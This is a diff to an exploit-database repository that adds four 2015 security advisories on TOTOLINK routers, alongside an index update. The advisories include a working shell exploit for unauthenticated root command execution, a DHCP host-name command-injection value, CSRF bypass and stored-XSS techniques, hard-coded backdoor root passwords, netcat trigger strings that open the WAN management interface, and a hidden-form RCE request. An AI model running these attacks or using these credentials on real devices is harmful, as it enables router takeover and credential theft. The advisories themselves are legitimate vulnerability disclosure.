diff --git a/files.csv b/files.csv
index 170e15f14..c66026290 100755
--- a/files.csv
+++ b/files.csv
@@ -16058,7 +16058,7 @@ id,file,description,date,author,platform,type,port
18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0
18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
-18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
+18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
@@ -33956,3 +33956,7 @@ id,file,description,date,author,platform,type,port
37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
+37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
+37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
+37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
+37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
diff --git a/platforms/hardware/webapps/37623.txt b/platforms/hardware/webapps/37623.txt
new file mode 100755
index 000000000..7b1ea8b3a
--- /dev/null
+++ b/platforms/hardware/webapps/37623.txt
@@ -0,0 +1,378 @@
+## Advisory Information
+
+Title: 15 TOTOLINK router models vulnerable to multiple RCEs
+Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
+Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
+Date published: 2015-07-16
+Vendors contacted: None
+Release mode: 0days, Released
+CVE: no current CVE
+
+
+
+## Product Description
+
+TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
+markets in South Korea.
+TOTOLINK produces routers routers, wifi access points and network
+devices. Their products are sold worldwide.
+
+
+
+## Vulnerabilities Summary
+
+The first vulnerability allows to bypass the admin authentication and
+to get a direct RCE from the LAN side with a single HTTP request.
+
+The second vulnerability allows to bypass the admin authentication and
+to get a direct RCE from the LAN side with a single DHCP request.
+
+There are direct RCEs against the routers which give a complete root
+access to the embedded Linux from the LAN side.
+
+The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to
+the latest firmwares with the default configuration:
+
+- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)
+- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)
+- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin
+- totolink.net)
+- TOTOLINK EX300 : until last firmware (9.36 -
+ex300_ch_9_36.bin.5357c0 - totolink.cn)
+- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
+- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)
+- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)
+- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
+- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
+- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK
+N302R Plus V1_en_8_82.bin)
+- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK
+N302R Plus V2_en_9_08.bin)
+- TOTOLINK A3004NS (no firmware available in totolinkusa.com but
+ipTIME's A3004NS model was vulnerable to the 2 RCEs)
+- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)
+
+
+The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares
+to the latest firmwares with the default configuration:
+
+- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)
+- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)
+
+
+Firmwares come from totolink.net and from totolink.cn.
+
+- - From my tests, it is possible to use these vulnerabilities to
+overwrite the firmware with a custom (backdoored) firmware.
+
+Concerning the high CVSS score (10/10) of the vulnerabilities and the
+longevity of this vulnerability (6+ year old),
+the TOTOLINK users are urged to contact TOTOLINK.
+
+
+
+## Details - RCE with a single HTTP request
+
+The HTTP server allows the attacker to execute some CGI files.
+
+Many of them are vulnerable to a command inclusion which allows to
+execute commands with the http daemon user rights (root).
+
+
+Exploit code:
+
+$ cat totolink.carnage
+#!/bin/sh
+if [ ! $1 ]; then
+echo "Usage:"
+echo $0 ip command
+exit 1
+fi
+wget -qO- --post-data="echo 'Content-type:
+text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh
+
+
+The exploits have been written in HTML/JavaScript, in form of CSRF
+attacks, allowing people to test their systems in live using their
+browsers:
+http://pierrekim.github.io/advisories/
+
+
+o Listing of the filesystem
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html
+
+Using CLI:
+
+root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
+ash
+auth
+busybox
+cat
+chmod
+cp
+d.cgi
+date
+echo
+false
+root@kali:~/totolink#
+
+
+o How to retrieve the credentials ? (see login and password at the end
+of the text file)
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html
+
+Using CLI:
+
+kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
+wantype.wan1=dynamic
+dhblock.eth1=0
+ppp_mtu=1454
+fakedns=0
+upnp=1
+ppp_mtu=1454
+timeserver=time.windows.com,gmt22,1,480,0
+wan_ifname=eth1
+auto_dns=1
+dhcp_auto_detect=0
+wireless_ifmode+wlan0=wlan0,0
+dhcpd=0
+lan_ip=192.168.1.1
+lan_netmask=255.255.255.0
+dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
+dhcpd_dns=164.124.101.2,168.126.63.2
+dhcpd_opt=7200,30,200,
+dhcpd_configfile=/etc/udhcpd.conf
+dhcpd_lease_file=/etc/udhcpd.leases
+dhcpd_static_lease_file=/etc/udhcpd.static
+use_local_gateway=1
+login=admin
+password=admin
+
+Login and password are stored in plaintext, which is a very bad
+security practice.
+
+
+o Current running process:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html
+
+Using CLI:
+
+kali# ./totolink.carnage 192.168.1.1 ps -auxww
+
+
+o Getting the kernel memory:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html
+
+Using CLI:
+
+kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore
+
+
+o Default firewall rules:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html
+
+Using CLI:
+
+kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL
+
+
+o Opening the management interface on the WAN:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html
+
+
+o Reboot the device:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html
+
+
+o Brick the device:
+
+HTML/JS exploits:
+
+http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html
+
+
+An attacker can use the /usr/bin/wget binary located in the file
+system of the remote device to plant a backdoor and then execute it as
+root.
+
+By the way, d.cgi in /bin/ is an intentional backdoor.
+
+
+
+## Details - RCE with a single DHCP request
+
+This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
+server in TOTOLINK devices allows remote attackers to execute
+arbitrary commands
+via shell metacharacters in the host-name field.
+
+Sending a DHCP request with this parameter will reboot the device:
+
+cat /etc/dhcp/dhclient.conf
+
+send host-name ";/sbin/reboot";
+
+When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
+will see the stdout of the /dev/console device;
+the dhcp request will immediately force the reboot of the remote device:
+
+
+Booting...
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
+@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
+@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
+@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
+@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+[...]
+WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
+
+Launch iwcontrol: wlan0
+Reaped 317
+iwcontrol RUN OK
+SIGNAL -> Config Update signal progress
+killall: pppoe-relay: no process killed
+SIGNAL -> WAN ip changed
+WAN0 IP: 192.168.2.1
+signalling START
+Invalid upnpd exit
+killall: upnpd: no process killed
+upnpd Restart 1
+iptables: Bad rule (does a matching rule exist in that chain?)
+Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
+Update Session timestamp and try it after 5 seconds again.
+ez_ipupdate callback --> time_elapsed: 0
+Run DDNS by IP change: / 192.168.2.1
+Reaped 352
+iptables: Bad rule (does a matching rule exist in that chain?)
+Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
+Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
+Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
+Reaped 363
+Led Silent Callback
+Turn ON All LED
+Dynamic Channel Search for wlan0 is OFF
+start_signal => plantynet_sync
+Do start_signal => plantynet_sync
+SIGNAL -> Config Update signal progress
+killall: pppoe-relay: no process killed
+SIGNAL -> WAN ip changed
+Reaped 354
+iptables: Bad rule (does a matching rule exist in that chain?)
+ez_ipupdate callback --> time_elapsed: 1
+Run DDNS by IP change: / 192.168.2.1
+Burst DDNS Registration is denied: iptime -> now:26
+Led Silent Callback
+Turn ON All LED
+/proc/sys/net/ipv4/tcp_syn_retries: cannot create
+- - - ---> Plantynet Event : 00000003
+- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE
+
+
+[sending the DHCP request]
+
+
+[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1
+00:01:03 miniupnpd[370]: received signal 15, good-bye
+Reaped 392
+Reaped 318
+Reaped 314
+Reaped 290
+Reaped 288
+Reaped 268
+Reaped 370
+Reaped 367
+- - - ---> PLANTYNET_SYNC_FREE_DEVICE
+Restarting system.
+
+Booting...
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
+@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
+@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
+@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
+@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+Reboot Result from Watchdog Timeout!
+
+- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
+Delay 1 second till reset button
+Magic Number: raw_nv 00000000
+Check Firmware(05020000) : size: 0x001ddfc8 ---->
+
+
+[...]
+
+
+An attacker can use the /usr/bin/wget binary located in the file
+system of the remote device to plant a backdoor and then execute it as
+root.
+
+
+
+## Vendor Response
+
+Due to "un-ethical code" found in TOTOLINK products (= backdoors found
+in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
+case, but ipTIME was contacted in April 2015 concerning the first RCE.
+
+
+
+## Report Timeline
+
+* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
+ipTIME products.
+* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
+* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
+* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
+EX750 routers.
+* Jul 13, 2015: Updated firmwares confirmed vulnerable.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Alexandre Torres and Pierre Kim
+(@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
+https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37624.txt b/platforms/hardware/webapps/37624.txt
new file mode 100755
index 000000000..99666508c
--- /dev/null
+++ b/platforms/hardware/webapps/37624.txt
@@ -0,0 +1,294 @@
+## Advisory Information
+
+Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks
+Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
+Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html
+Date published: 2015-07-16
+Vendors contacted: None
+Release mode: Released, 0day
+CVE: no current CVE
+
+
+
+## Product Description
+
+TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
+markets in South Korea.
+TOTOLINK produces routers routers, wifi access points and network
+devices. Their products are sold worldwide.
+
+
+
+## Vulnerability Summary
+
+TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers.
+Their current firmwares with default configuration are
+vulnerable to CSRF-attacks and XSS attacks.
+Since, the anti-CSRF protection is based on a static HTTP referrer
+(RFC 1945), an attacker can take over
+most of the configuration and settings using anyone inside the LAN of
+the router. Owners are urged to
+contact TOTOLINK, and activate authentication on this product
+(disabled by default).
+
+It affects (firmware come from totolink.net and from totolink.cn):
+
+TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update)
+TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update)
+TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN
+(TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update)
+TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN
+(TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update)
+
+
+
+## Details - CSRF
+
+The HTTP interface allows to edit the configuration. This interface is
+vulnerable to CSRF.
+
+Configuration and settings can be modified with CSRF attacks:
+Activate the remote control management
+Change the DNS configuration
+Update the firmware
+Change the Wifi Configuration
+Create TCP redirections to the LAN
+and more...
+
+
+Example of forms exploiting the CSRF:
+
+
+o Activating the remote control management on port 31337/tcp listening
+on the WAN interface.
+
+
+
+
+
+
+
+
+
+
+
+o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1:
+
+
+
+
+
+
+
+
+
+
+
+The variable GO is an open redirect. Any URL like
+http://www.google.com/ for instance can be used.
+The variable GO is also vulnerable to XSS. It's out of scope in this advisory.
+
+
+To bypass the protection (which checks the refer), you can, for
+example, base64 the form and include
+it in the webpage.
+The refer will be empty and the CSRF will be accepted by the device:
+
+
+
+o activate_admin_wan_csrf_bypass.html:
+
+
+
+
+
+
+
+
+
+
+Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate
+the remote management interface on port 31337/TCP.
+
+You can test it through
+http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html
+
+
+
+o change_dns_csrf_bypass.html:
+
+
+
+
+
+
+
+
+
+
+Visiting activate_admin_wan_csrf_bypass.html in a remote location will
+change the DNS servers
+provided by the TOTOLINK device in the LAN.
+
+You can test it through
+http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html
+
+
+
+## Details - stored XSS and fun
+
+There is a stored XSS, which can be injected using UPNP from the LAN,
+without authentication:
+
+upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping
+
+Required argument:
+Argument Name: NewPortMappingDescription
+Data Type: string
+Allowed Values: []
+Set NewPortMappingDescription value to:
+
+Required argument:
+Argument Name: NewLeaseDuration
+Data Type: ui4
+Allowed Values: []
+Set NewLeaseDuration value to: 0
+
+Required argument:
+Argument Name: NewInternalClient
+Data Type: string
+Allowed Values: []
+Set NewInternalClient value to:
+
+Required argument:
+Argument Name: NewEnabled
+Data Type: boolean
+Allowed Values: []
+Set NewEnabled value to: 1
+
+Required argument:
+Argument Name: NewExternalPort
+Data Type: ui2
+Allowed Values: []
+Set NewExternalPort value to: 80
+
+Required argument:
+Argument Name: NewRemoteHost
+Data Type: string
+Allowed Values: []
+Set NewRemoteHost value to:
+
+Required argument:
+Argument Name: NewProtocol
+Data Type: string
+Allowed Values: ['TCP', 'UDP']
+Set NewProtocol value to: TCP
+
+Required argument:
+Argument Name: NewInternalPort
+Data Type: ui2
+Allowed Values: []
+Set NewInternalPort value to: 80
+
+
+upnp>
+
+
+The UPNP webpage in the administration area
+(http://192.168.0.1/popup_upnp_portmap.html) will show:
+
+[...]
+
+| TCP |
+21331 |
+:28777 |
+ |
+
+[...]
+
+
+- From my research, there are some bits overflapping with others,
+resulting in showing funny ports
+and truncating input data. A remote DoS against the upnpd process
+seems to be easily done.
+
+Gaining Remote Code Execution by UPNP exploitation is again left as a
+exercise for the reader.
+
+
+
+## Vendor Response
+
+Due to "un-ethical code" found in TOTOLINK products (= backdoors found
+in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
+case.
+
+
+
+## Report Timeline
+
+* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
+* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
+* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
+for similar ipTIME products.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Pierre Kim (@PierreKimSec).
+
+
+
+## Greetings
+
+Big thanks to Alexandre Torres.
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
diff --git a/platforms/hardware/webapps/37625.txt b/platforms/hardware/webapps/37625.txt
new file mode 100755
index 000000000..3bd0a46b3
--- /dev/null
+++ b/platforms/hardware/webapps/37625.txt
@@ -0,0 +1,122 @@
+## Advisory Information
+
+Title: Backdoor credentials found in 4 TOTOLINK router models
+Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
+Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html
+Date published: 2015-07-16
+Vendors contacted: None
+Release mode: 0days, Released
+CVE: no current CVE
+
+
+
+## Product Description
+
+TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
+markets in South Korea.
+TOTOLINK produces routers routers, wifi access points and network
+devices. Their products are sold worldwide.
+
+
+
+## Vulnerabilities Summary
+
+Backdoor credentials are present in several TOTOLINK products.
+
+It affects 4 TOTOLINK products (firmwares come from totolink.net and
+from totolink.cn):
+
+G150R-V1 : last firmware 1.0.0-B20150330
+(TOTOLINK-G150R-V1.0.0-B20150330.1734.web)
+G300R-V1 : last firmware 1.0.0-B20150330
+(TOTOLINK-G300R-V1.0.0-B20150330.1816.web)
+N150RH-V1 : last firmware 1.0.0-B20131219
+(TOTOLINK-N150RH-V1.0.0-B20131219.1014.web)
+N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web)
+
+It allows an attacker in the LAN to connect to the device using telnet
+with 2 different accounts: root and 'onlime_r' which gives with root
+privileges.
+
+
+
+## Details - G150R-V1 and G300R-V1
+
+The init.d script executes these commands when the router starts:
+
+[...]
+cp /etc/passwd_orig /var/passwd
+cp /etc/group_orig /var/group
+telnetd&
+[...]
+
+
+The /etc/passwd_orig contains backdoor credentials:
+
+root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+nobody:x:0:0:nobody:/:/dev/null
+
+The corresponding passwords are:
+
+root:12345
+onlime_r:12345
+
+
+## Details - N150RH-V1 and N301RT
+
+The init.d script executes these commands when the router starts:
+
+[...]
+#start telnetd
+telnetd&
+[...]
+
+The binary /bin/sysconf executes these commands when the router starts:
+
+system("cp /etc/passwd.org /var/passwd 2> /dev/null")
+
+
+The /etc/passwd.org contains backdoor credentials:
+
+root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+nobody:x:0:0:nobody:/:/dev/null
+
+The corresponding passwords are:
+
+root:12345
+onlime_r:12345
+
+
+
+## Vendor Response
+
+TOTOLINK was not contacted in regard of this case.
+
+
+
+## Report Timeline
+
+* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
+* Jun 26, 2015: working PoCs.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These backdoor credentials were found Pierre Kim (@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37626.txt b/platforms/hardware/webapps/37626.txt
new file mode 100755
index 000000000..11f8e3204
--- /dev/null
+++ b/platforms/hardware/webapps/37626.txt
@@ -0,0 +1,199 @@
+## Advisory Information
+
+Title: Backdoor and RCE found in 8 TOTOLINK router models
+Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
+Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
+Date published: 2015-07-16
+Vendors contacted: None
+Release mode: 0days, Released
+CVE: no current CVE
+
+
+
+## Product Description
+
+TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO
+markets in South Korea.
+TOTOLINK produces routers routers, wifi access points and network
+devices. Their products are sold worldwide.
+
+
+
+## Vulnerabilities Summary
+
+A backdoor is present in several TOTOLINK products.
+This was confirmed by analysing the latest firmwares and by testing
+the backdoor against live routers.
+
+At least 8 TOTOLINK products are affected (firmwares come from
+totolink.net and from totolink.cn):
+
+ - A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web
+ - F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web
+ - F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web
+ - N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web
+ - N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web
+ - N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web
+ - N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web
+ - N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
+
+
+By sending a crafted request to the WAN IP, an attacker will open the
+HTTP remote management interface on the Internet.
+Then an attacker can use a Remote Code Execution in the HTTP remote
+management interface by using the hidden /boafrm/formSysCmd form,
+bypassing the authentication system.
+
+We estimate there are =~ 50 000 routers affected by this backdoor.
+
+
+
+## Details - backdoor
+
+The init.d script executes the /bin/skt binary when the router starts:
+
+ cat etc/init.d/rcS
+ [...]
+ # start web server
+ boa
+ skt&
+
+
+skt is a small MIPS binary which is a client/server program. The arguments are:
+
+ server: ./skt
+ client: ./skt host cmd
+
+
+The binary can be used in x86_64 machines using QEMU: sudo chroot .
+./qemu-mips-static ./bin/skt
+
+Using skt without argument will launch a TCP daemon on port 5555 in
+every interface (including WAN), acting as an ECHO server.
+Using skt with arguments will send a TCP packet containing the command
+to the specified IP on port 5555.
+
+The analysis of the binary running on the TOTOLINK devices (for more
+details, read
+https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html
+) shows the server mode responds to 3 commands by silently executing
+system() in the background:
+
+
+ o By sending "hel,xasf" to the device, the device will execute:
+iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
+
+ This will open the HTTP remote management interface on port 80 in
+the eth1 interface which is the WAN interface by default.
+
+
+ o By sending "oki,xasf" to the device, the device will execute:
+iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT
+
+ This will close the HTTP remote management interface.
+
+
+ o By sending "bye,xasf" to the device, the device will do nothing
+
+
+The iptables commands in the backdoor are hardcoded with "eth1".
+Only devices using DHCP and static IP connections are affected because
+the WAN IP is attached on the eth1 device.
+
+It does not affect devices using PPPoE connections, because the WAN IP
+is attached on the ppp device, as seen below:
+
+totolink# ifconfig
+ppp0 Link encap:Point-to-Point Protocol
+ inet addr:X.X.X.X P-t-P:X.X.X.X Mask:255.255.255.255
+ UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1438 Metric:1
+ RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0
+ TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0
+ collisions:0 txqueuelen:64
+ RX bytes:2803138455 (2.6 GiB) TX bytes:277402492 (264.5 MiB)
+
+
+
+An attacker can use these simple netcat commands to test the backdoor:
+
+To open the HTTP remote management interface on the Internet:
+
+ echo -ne "hel,xasf" | nc 5555
+
+To close the HTTP remote management interface on the Internet:
+
+ echo -ne "oki,xasf" | nc 5555
+
+To detect a vulnerable router:
+
+ echo -ne "GET / HTTP/1.1" | nc 5555
+
+ if you see "GET / HTTP/1.1" in the answer, you likely detected a
+vulnerable router.
+
+
+## Details - RCE in the management interface
+
+A hidden form in the latest firmware allows an attacker to execute
+commands as root by sending a HTTP request:
+
+
+ POST /boafrm/formSysCmd HTTP/1.1
+
+ sysCmd=&apply=Apply&msg=
+
+
+An attacker can use wget to execute commands in the remote device:
+
+ wget --post-data='sysCmd=&apply=Apply&msg='
+http://ip//boafrm/formSysCmd
+
+
+For instance, sending this HTTP request to the management interface
+will reboot the device:
+
+
+ POST /boafrm/formSysCmd HTTP/1.1
+
+ sysCmd=reboot&apply=Apply&msg=
+
+This wget command will do the same job:
+
+ wget --post-data='sysCmd=reboot&apply=Apply&msg='
+http://ip//boafrm/formSysCmd
+
+
+
+## Vendor Response
+
+TOTOLINK was not contacted in regard of this case.
+
+
+
+## Report Timeline
+
+* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
+* Jun 26, 2015: Working PoCs with RCE.
+* Jul 13, 2015: Updated firmwares confirmed vulnerable.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Alexandre Torres and Pierre Kim
+(@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
+https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file